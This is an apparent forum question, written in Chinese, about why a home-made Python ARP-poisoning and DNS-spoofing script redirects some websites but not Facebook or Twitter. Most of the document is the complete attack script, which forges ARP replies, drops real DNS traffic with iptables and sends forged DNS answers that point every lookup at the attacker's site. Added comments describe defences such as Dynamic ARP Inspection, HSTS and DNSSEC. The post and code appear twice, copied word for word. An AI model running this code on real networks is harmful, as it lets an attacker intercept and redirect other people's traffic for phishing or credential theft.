我的 DNS 欺骗仅适用于某些站点?
my dns spoofing only works with some sites?
我用 Python 写了一个 DNS 欺骗程序(配合 ARP 投毒),只是为了好玩。我的目标只是把受害者的 DNS 请求重定向到我的站点,这样无论他们访问哪个网站,最终都会到达我的站点。然而,它似乎只对部分网站有效:访问 twitter 或 facebook 等网站时似乎不起作用,而访问 google 或较小的网站时却能正常重定向。我还在代码中使用了 iptables 规则来阻止来自路由器的所有 DNS。
有人知道为什么吗?
代码:
#command line arguments
# NOTE(review): the three values are used exactly as typed; no type= or
# validation callback checks that they are well-formed IP addresses.
parser = argparse.ArgumentParser(description='ARP Poisoning and DNS Spoofing')
parser.add_argument('-v', '--victim', dest='victimIP', help="IP Address of victim", required=True)
parser.add_argument('-t', '--target', dest='targetIP', help="IP Address of spoof site", required=True)
parser.add_argument('-r', '--router', dest='routerIP', help="IP Address of Router", required=True)
# Runs at module level, so argument parsing happens as soon as the file is executed.
args = parser.parse_args()
vIP = args.victimIP
targetIP = args.targetIP
routerIP = args.routerIP
# Module-level MAC placeholders. main() assigns same-named variables without a
# `global` statement, so those are locals and these three stay empty strings.
localMAC = ""
victimMAC = ""
routerMAC = ""
#Setup function
def setup():
# Change host networking state before the threads start: enable IP forwarding
# and add one packet-filter rule. Both commands presumably need root - confirm.
#setup forwarding rules
#disable forwarding of DNS requests to router
# Writes 1 to the kernel's ip_forward switch. Nothing visible in this file
# records the previous value or writes it back on exit.
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
#iptables rule
# Appends a FORWARD-chain rule that drops UDP packets with destination port 53.
# The child process is started through the shell and its exit status is not checked.
Popen(["iptables -A FORWARD -p UDP --dport 53 -j DROP"], shell=True, stdout=PIPE)
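#Remove our iptables rule on exit
def reset():
    """Delete the DNS-drop rule that setup() appended to the FORWARD chain.

    The earlier form ran ``iptables -F``, which empties every chain in the
    filter table, including rules that were on the host before this script
    ran. Deleting only the matching rule leaves the rest of the host
    firewall as it was.
    """
    # The rule spec mirrors the one appended in setup(); an argument list
    # keeps the shell out of it. wait() lets the deletion finish before the
    # caller exits the process.
    Popen(["iptables", "-D", "FORWARD", "-p", "udp", "--dport", "53", "-j", "DROP"]).wait()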
#get MACaddress of local machine
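def getOurMAC(interface):
    """Return the hardware address recorded for a local network interface.

    Reads the first line of /sys/class/net/<interface>/address and returns
    its first 17 characters. If the file cannot be opened or read, the
    all-zero address "00:00:00:00:00:00" is returned instead.
    """
    try:
        # Context manager closes the handle; the original left it open.
        with open('/sys/class/net/' + interface + '/address') as addr_file:
            mac = addr_file.readline()
    except (IOError, OSError):
        # Narrowed from a bare except, which also swallowed KeyboardInterrupt
        # and SystemExit.
        mac = "00:00:00:00:00:00"
    return mac[0:17]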
#returns MAC address of victim IP
def getTargetMAC(IP):
# Return the MAC address that `arp -n` reports for the given address.
# The parameter name IP shadows, inside this function only, the name IP that
# reply() uses as a packet layer.
#add the target to our system's ARP cache
# pingResult is not used again after this line.
pingResult = Popen(["ping", "-c 1", IP], stdout=PIPE)
pid = Popen(["arp", "-n", IP], stdout=PIPE)
s = pid.communicate()[0]
# Takes the first run of six colon-separated groups of one or two characters
# from [a-f0-9]. If nothing matches, re.search returns None and .groups()
# raises AttributeError.
MAC = re.search(r"(([a-f\d]{1,2}\:){5}[a-f\d]{1,2})", s).groups()[0]
return MAC
#constructs and sends arp packets to send to router and to victim.
def ARPpoison(localMAC, victimMAC, routerMAC):
# Build two ARP replies (op=2) and resend both with a 3-second pause between rounds.
# The first tells vIP that routerIP is at localMAC; the second tells routerIP
# that vIP is at localMAC. vIP and routerIP are read from module globals.
# Defender note: repeated unsolicited ARP replies that rebind the gateway's IP
# to a different MAC are what ARP-monitoring tools and switch-level Dynamic ARP
# Inspection are built to catch; static ARP entries for the gateway ignore them.
arpPacketVictim = Ether(src=localMAC, dst=victimMAC)/ARP(hwsrc=localMAC, hwdst=victimMAC, psrc=routerIP, pdst=vIP, op=2)
arpPacketRouter = Ether(src=localMAC, dst=routerMAC)/ARP(hwsrc=localMAC, hwdst=routerMAC, psrc=vIP, pdst=routerIP, op=2)
# This message is printed before any packet has been sent.
print str(vIP) + " has been poisoned."
# NOTE(review): indentation was lost in this listing; the try/except presumably
# sits inside the loop - confirm against the original file.
while True:
try:
sendp(arpPacketVictim, verbose=0)
sendp(arpPacketRouter, verbose=0)
#pause between each send
time.sleep(3)
except KeyboardInterrupt:
sys.exit(0)
#construct and send a spoofed DNS response packet to the victim
def reply(packet):
# Send one forged DNS answer built from the captured query `packet`.
# targetIP is only read here.
global targetIP
# The response swaps the query's UDP ports, reuses its DNS id and question
# section, sets qr=1 and aa=1, and carries a single DNSRR whose rdata is
# targetIP with ttl=10. The IP source is the address the query was sent to;
# the destination is vIP. Every query name gets the same rdata.
# Defender note: a forged answer changes only the address lookup. A client that
# then connects over HTTPS still validates the certificate for the name it
# asked for, and sites enforcing HSTS are not fetched over plain HTTP. DNSSEC
# validation or an encrypted resolver channel (DoT/DoH) protects the lookup itself.
responsePacket = (IP(dst=vIP, src=packet[IP].dst)/UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)/\
DNS(id=packet[DNS].id, qd=packet[DNS].qd, aa=1, qr=1, an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=targetIP)))
send(responsePacket, verbose=0)
print "Sent spoofed DNS Packet"
return
#this parse creates a thread
def parse(packet):
# Callback given to sniff(): for a packet that has a DNS layer with qr == 0
# (a query, not a response), start a new thread whose target is reply.
if packet.haslayer(DNS) and packet.getlayer(DNS).qr==0:
# One thread is created per matching packet; it is not joined or tracked.
replyThread = threading.Thread(target=reply, args=packet)
replyThread.start()
#initiate sniff filter for DNS requests
def DNSsniffer():
# Capture packets matching the filter below and pass each one to parse().
# sniff() is called without a count or timeout argument.
# vIP is only read here.
global vIP
print "Sniffing DNS"
# Capture filter: UDP, port 53, source address vIP.
sniffFilter = "udp and port 53 and src " +str(vIP)
sniff(filter=sniffFilter, prn=parse)
# main function
def main():
# Resolve the three MAC addresses, start the ARP and sniffer threads as
# daemons, then idle until Ctrl-C.
# These three names are locals: there is no `global` statement, so the
# module-level placeholders of the same names are not updated.
victimMAC = getTargetMAC(vIP)
# The interface name is hard-coded.
localMAC = getOurMAC("eno1")#Datacomm card
routerMAC = getTargetMAC(routerIP)
#threads creation
ARPThread = threading.Thread(target=ARPpoison, args=(localMAC, victimMAC, routerMAC))
sniffThread = threading.Thread(target=DNSsniffer)
#
# Daemon threads do not keep the process alive once the main thread exits.
ARPThread.daemon = True
sniffThread.daemon = True
#
ARPThread.start()
sniffThread.start()
#Keyboard Interrupt
# The main thread only sleeps; on Ctrl-C it calls reset() and exits. Nothing
# in this function touches the ip_forward setting written by setup().
while True:
try:
time.sleep(5)
except KeyboardInterrupt:
reset()
print "Exiting"
sys.exit(0)
#--------------------------------------------------
# Both calls run unconditionally at module level: there is no
# `if __name__ == "__main__":` guard, so importing this file also changes the
# host's forwarding and firewall state and starts the threads.
setup()
main()
更新:
我做了一些进一步的测试:当受害者访问 google 这样的网站时,重定向似乎很正常,网站加载也很快;但对于 facebook 或 twitter 这样的大型网站,页面似乎一直在加载。
我可以生成进程而不是生成线程吗?
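原来只是 facebook 和 twitter 自身的安全机制阻止了欺骗,我的代码没有问题。(作者没有说明具体机制;很可能是这些站点强制使用 HTTPS 并启用 HSTS:浏览器会校验服务器证书,且不会降级到 HTTP,所以即使 DNS 应答被伪造,页面也无法从伪造的地址正常加载,这与前面"似乎永远加载"的现象相符。)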
我用 Python 写了一个 DNS 欺骗程序(配合 ARP 投毒),只是为了好玩。我的目标只是把受害者的 DNS 请求重定向到我的站点,这样无论他们访问哪个网站,最终都会到达我的站点。然而,它似乎只对部分网站有效:访问 twitter 或 facebook 等网站时似乎不起作用,而访问 google 或较小的网站时却能正常重定向。我还在代码中使用了 iptables 规则来阻止来自路由器的所有 DNS。
有人知道为什么吗?
代码:
#command line arguments
# NOTE(review): the three values are used exactly as typed; no type= or
# validation callback checks that they are well-formed IP addresses.
parser = argparse.ArgumentParser(description='ARP Poisoning and DNS Spoofing')
parser.add_argument('-v', '--victim', dest='victimIP', help="IP Address of victim", required=True)
parser.add_argument('-t', '--target', dest='targetIP', help="IP Address of spoof site", required=True)
parser.add_argument('-r', '--router', dest='routerIP', help="IP Address of Router", required=True)
# Runs at module level, so argument parsing happens as soon as the file is executed.
args = parser.parse_args()
vIP = args.victimIP
targetIP = args.targetIP
routerIP = args.routerIP
# Module-level MAC placeholders. main() assigns same-named variables without a
# `global` statement, so those are locals and these three stay empty strings.
localMAC = ""
victimMAC = ""
routerMAC = ""
#Setup function
def setup():
# Change host networking state before the threads start: enable IP forwarding
# and add one packet-filter rule. Both commands presumably need root - confirm.
#setup forwarding rules
#disable forwarding of DNS requests to router
# Writes 1 to the kernel's ip_forward switch. Nothing visible in this file
# records the previous value or writes it back on exit.
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
#iptables rule
# Appends a FORWARD-chain rule that drops UDP packets with destination port 53.
# The child process is started through the shell and its exit status is not checked.
Popen(["iptables -A FORWARD -p UDP --dport 53 -j DROP"], shell=True, stdout=PIPE)
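#Remove our iptables rule on exit
def reset():
    """Delete the DNS-drop rule that setup() appended to the FORWARD chain.

    The earlier form ran ``iptables -F``, which empties every chain in the
    filter table, including rules that were on the host before this script
    ran. Deleting only the matching rule leaves the rest of the host
    firewall as it was.
    """
    # The rule spec mirrors the one appended in setup(); an argument list
    # keeps the shell out of it. wait() lets the deletion finish before the
    # caller exits the process.
    Popen(["iptables", "-D", "FORWARD", "-p", "udp", "--dport", "53", "-j", "DROP"]).wait()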
#get MACaddress of local machine
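def getOurMAC(interface):
    """Return the hardware address recorded for a local network interface.

    Reads the first line of /sys/class/net/<interface>/address and returns
    its first 17 characters. If the file cannot be opened or read, the
    all-zero address "00:00:00:00:00:00" is returned instead.
    """
    try:
        # Context manager closes the handle; the original left it open.
        with open('/sys/class/net/' + interface + '/address') as addr_file:
            mac = addr_file.readline()
    except (IOError, OSError):
        # Narrowed from a bare except, which also swallowed KeyboardInterrupt
        # and SystemExit.
        mac = "00:00:00:00:00:00"
    return mac[0:17]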
#returns MAC address of victim IP
def getTargetMAC(IP):
# Return the MAC address that `arp -n` reports for the given address.
# The parameter name IP shadows, inside this function only, the name IP that
# reply() uses as a packet layer.
#add the target to our system's ARP cache
# pingResult is not used again after this line.
pingResult = Popen(["ping", "-c 1", IP], stdout=PIPE)
pid = Popen(["arp", "-n", IP], stdout=PIPE)
s = pid.communicate()[0]
# Takes the first run of six colon-separated groups of one or two characters
# from [a-f0-9]. If nothing matches, re.search returns None and .groups()
# raises AttributeError.
MAC = re.search(r"(([a-f\d]{1,2}\:){5}[a-f\d]{1,2})", s).groups()[0]
return MAC
#constructs and sends arp packets to send to router and to victim.
def ARPpoison(localMAC, victimMAC, routerMAC):
# Build two ARP replies (op=2) and resend both with a 3-second pause between rounds.
# The first tells vIP that routerIP is at localMAC; the second tells routerIP
# that vIP is at localMAC. vIP and routerIP are read from module globals.
# Defender note: repeated unsolicited ARP replies that rebind the gateway's IP
# to a different MAC are what ARP-monitoring tools and switch-level Dynamic ARP
# Inspection are built to catch; static ARP entries for the gateway ignore them.
arpPacketVictim = Ether(src=localMAC, dst=victimMAC)/ARP(hwsrc=localMAC, hwdst=victimMAC, psrc=routerIP, pdst=vIP, op=2)
arpPacketRouter = Ether(src=localMAC, dst=routerMAC)/ARP(hwsrc=localMAC, hwdst=routerMAC, psrc=vIP, pdst=routerIP, op=2)
# This message is printed before any packet has been sent.
print str(vIP) + " has been poisoned."
# NOTE(review): indentation was lost in this listing; the try/except presumably
# sits inside the loop - confirm against the original file.
while True:
try:
sendp(arpPacketVictim, verbose=0)
sendp(arpPacketRouter, verbose=0)
#pause between each send
time.sleep(3)
except KeyboardInterrupt:
sys.exit(0)
#construct and send a spoofed DNS response packet to the victim
def reply(packet):
# Send one forged DNS answer built from the captured query `packet`.
# targetIP is only read here.
global targetIP
# The response swaps the query's UDP ports, reuses its DNS id and question
# section, sets qr=1 and aa=1, and carries a single DNSRR whose rdata is
# targetIP with ttl=10. The IP source is the address the query was sent to;
# the destination is vIP. Every query name gets the same rdata.
# Defender note: a forged answer changes only the address lookup. A client that
# then connects over HTTPS still validates the certificate for the name it
# asked for, and sites enforcing HSTS are not fetched over plain HTTP. DNSSEC
# validation or an encrypted resolver channel (DoT/DoH) protects the lookup itself.
responsePacket = (IP(dst=vIP, src=packet[IP].dst)/UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)/\
DNS(id=packet[DNS].id, qd=packet[DNS].qd, aa=1, qr=1, an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=targetIP)))
send(responsePacket, verbose=0)
print "Sent spoofed DNS Packet"
return
#this parse creates a thread
def parse(packet):
# Callback given to sniff(): for a packet that has a DNS layer with qr == 0
# (a query, not a response), start a new thread whose target is reply.
if packet.haslayer(DNS) and packet.getlayer(DNS).qr==0:
# One thread is created per matching packet; it is not joined or tracked.
replyThread = threading.Thread(target=reply, args=packet)
replyThread.start()
#initiate sniff filter for DNS requests
def DNSsniffer():
# Capture packets matching the filter below and pass each one to parse().
# sniff() is called without a count or timeout argument.
# vIP is only read here.
global vIP
print "Sniffing DNS"
# Capture filter: UDP, port 53, source address vIP.
sniffFilter = "udp and port 53 and src " +str(vIP)
sniff(filter=sniffFilter, prn=parse)
# main function
def main():
# Resolve the three MAC addresses, start the ARP and sniffer threads as
# daemons, then idle until Ctrl-C.
# These three names are locals: there is no `global` statement, so the
# module-level placeholders of the same names are not updated.
victimMAC = getTargetMAC(vIP)
# The interface name is hard-coded.
localMAC = getOurMAC("eno1")#Datacomm card
routerMAC = getTargetMAC(routerIP)
#threads creation
ARPThread = threading.Thread(target=ARPpoison, args=(localMAC, victimMAC, routerMAC))
sniffThread = threading.Thread(target=DNSsniffer)
#
# Daemon threads do not keep the process alive once the main thread exits.
ARPThread.daemon = True
sniffThread.daemon = True
#
ARPThread.start()
sniffThread.start()
#Keyboard Interrupt
# The main thread only sleeps; on Ctrl-C it calls reset() and exits. Nothing
# in this function touches the ip_forward setting written by setup().
while True:
try:
time.sleep(5)
except KeyboardInterrupt:
reset()
print "Exiting"
sys.exit(0)
#--------------------------------------------------
# Both calls run unconditionally at module level: there is no
# `if __name__ == "__main__":` guard, so importing this file also changes the
# host's forwarding and firewall state and starts the threads.
setup()
main()
更新: 我做了一些进一步的测试:当受害者访问 google 这样的网站时,重定向似乎很正常,网站加载也很快;但对于 facebook 或 twitter 这样的大型网站,页面似乎一直在加载。
我可以生成进程而不是生成线程吗?
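原来只是 facebook 和 twitter 自身的安全机制阻止了欺骗,我的代码没有问题。(作者没有说明具体机制;很可能是这些站点强制使用 HTTPS 并启用 HSTS:浏览器会校验服务器证书,且不会降级到 HTTP,所以即使 DNS 应答被伪造,页面也无法从伪造的地址正常加载,这与前面"似乎永远加载"的现象相符。)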